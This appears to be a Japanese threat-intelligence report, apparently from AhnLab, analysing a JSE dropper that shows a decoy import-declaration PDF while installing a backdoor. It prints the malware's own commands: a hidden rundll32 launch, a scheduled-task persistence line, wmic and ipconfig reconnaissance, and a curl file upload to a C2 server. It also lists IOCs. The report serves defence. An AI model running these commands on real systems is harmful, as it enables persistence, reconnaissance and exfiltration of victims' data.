- 輸入申告書_捺印.jse
ファイル内部には難読化された PowerShell スクリプト、Base64 でエンコードされたバックドアファイル、および正常な PDF が存在する。
PowerShell スクリプトにより「輸入申告書.PDF」のファイル名で正常な PDF が保存されて自動実行され、ファイル内部には攻撃対象の情報が含まれている。正常な PDF を生成および実行することにより、ユーザーに不正なバックドアファイルが実行中であることを認知されにくいようにしているものと推定される。
バックグラウンドでは %ProgramData% パスに「vuVvMKg.i3IO」のファイル名でバックドアを生成し、rundll32.exe を利用してマルウェアを実行させる。
- powershell.exe -windowstyle hidden rundll32.exe ProgramData\\vuVuMKg.i3IO UpdateSystem
実行されたマルウェアは持続性維持のために %ProgramData% パスと %Public% パスに「IconCache.db」のファイル名でコピーしたあと、タスクスケジューラ登録を実行する。
- cmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\Programdata\IconCache.db UpdateSystem /sc onlogon /rl highest /f
バックドアはシステム情報の窃取のために wmic コマンドによって攻撃対象の AntiVirus 状態を確認し、ipconfig コマンドによってネットワーク情報を収集する。
- cmd.exe /U /c wimc /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt
- ipconfig /all
その後は Host Name、User Name、OS 情報等の情報を収集して検知を回避するためにコマンド実行結果をエンコードして C2 に送信する。
また、システム情報の窃取を含む以下のコマンドを実行して被害システムでバックドアとしての役割を遂行し、curl ツールを用いて C2 サーバーへのアップロード機能までを実行する。
- getinfo : システム情報
- die : 終了
- where : 実行パス
- run : 特定ファイルおよびコマンドの実行
- curl -k -F “fileToUpload=@%s” -F “id=%S” %s
このように、おとりドキュメントファイルと共に実行されるため、一般のユーザーはシステムがマルウェアに感染したことを認知できていないケースが多い。このようなタイプのマルウェアは特定の対象を狙って攻撃するため、出どころの分からないメールの添付ファイルを実行しないように注意する必要がある。
[ファイル検知]
- Dropper/JS.Generic (2023.11.16.02)
- Backdoor/Win.Nikidoor (2023.11.15.03)
[IOC]
- MD5
d2335df6d17fc7c2a5d0583423e39ff8
d6abeeb469e2417bbcd3c122c06ba099 - C2
hxxp://rscnode.dothome.co[.]kr/index.php
hxxp://rscnode.dothome.co[.]kr/upload.php
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories: マルウェアの情報